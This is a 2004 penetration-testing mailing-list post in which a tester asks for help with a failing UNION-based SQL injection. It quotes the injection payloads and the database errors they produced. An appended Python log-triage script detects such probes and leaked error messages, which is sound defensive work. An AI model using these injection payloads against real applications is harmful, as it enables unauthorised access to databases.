Penetration Testing mailing list archives

SQL Injection & incompatible with int issue


From: Peter Bair <peterbair100 () hotmail com>
Date: 9 Jun 2004 23:51:06 -0000



I am currently testing an application that reveals its tables. I know the exact columns to perform a union but when I try the following:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1+--

RESULT:
Operand type clash: text is incompatible with int

So I will try the solution:

xxx.xxx.xxx/item='+union select @@version,1,1,1,1,1,1,1,1,1,1,1,1,1,"text"+--

RESULT:
Invalid column name 'text'.

I know that "text" is in the correct position and I tried 'text'.

Is this app safe or can I go further?

Thanks for any help.
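
An added example, not part of the original post: a defender-side triage of web logs that flags UNION-based probes in the `item` parameter and responses that leak database error text such as the two messages quoted above. The `/view?item=` path, the sample entries, and the third error pattern are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# A quote followed by UNION [ALL] SELECT, the request shape quoted in the post.
PROBE = re.compile(r"'\s*union\s+(all\s+)?select\b", re.I)

# Database error text that should never reach a client. The first two are the
# messages quoted in the post; the third is an assumed extra pattern.
LEAKS = [
    re.compile(r"Operand type clash", re.I),
    re.compile(r"Invalid column name", re.I),
    re.compile(r"Unclosed quotation mark", re.I),
]

def classify(url, body):
    """Label one (request URL, response body) pair, or return None if clean."""
    query = unquote_plus(url.partition("?")[2])  # decode %27 and '+' first
    probe = bool(PROBE.search(query))
    leak = any(p.search(body) for p in LEAKS)
    if probe and leak:
        return "probe+leak"  # input reached the database and its error came back
    if probe:
        return "probe"       # injection attempt, no database error echoed
    if leak:
        return "leak"        # verbose errors exposed even without a probe
    return None

def triage(entries):
    """Return (index, label) for every entry that needs attention."""
    findings = []
    for i, (url, body) in enumerate(entries):
        label = classify(url, body)
        if label:
            findings.append((i, label))
    return findings

# Constructed sample log entries (not taken from a real system).
SAMPLE = [
    ("/view?item=42", "<html>Item 42</html>"),
    ("/view?item=%27+union+select+1,1,1+--",
     "Operand type clash: text is incompatible with int"),
    ("/view?item=%27+UNION+ALL+SELECT+1,1+--", "<html>Not found</html>"),
    ("/view?item=abc", "Invalid column name 'abc'."),
]

if __name__ == "__main__":
    for index, label in triage(SAMPLE):
        print(index, label, SAMPLE[index][0])
```

A "probe+leak" or "leak" finding means raw database errors are returned to clients, which calls for parameterized queries on the affected parameter and generic error pages.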

